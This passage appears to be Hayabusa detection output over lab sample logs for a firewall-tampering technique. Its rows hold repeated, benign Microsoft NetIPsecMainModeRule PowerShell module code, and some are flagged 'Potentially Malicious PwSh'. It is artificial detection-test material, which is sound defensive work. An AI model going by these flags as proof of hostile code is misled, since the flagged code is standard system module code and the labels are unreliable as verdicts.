($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param(",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName ))",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) 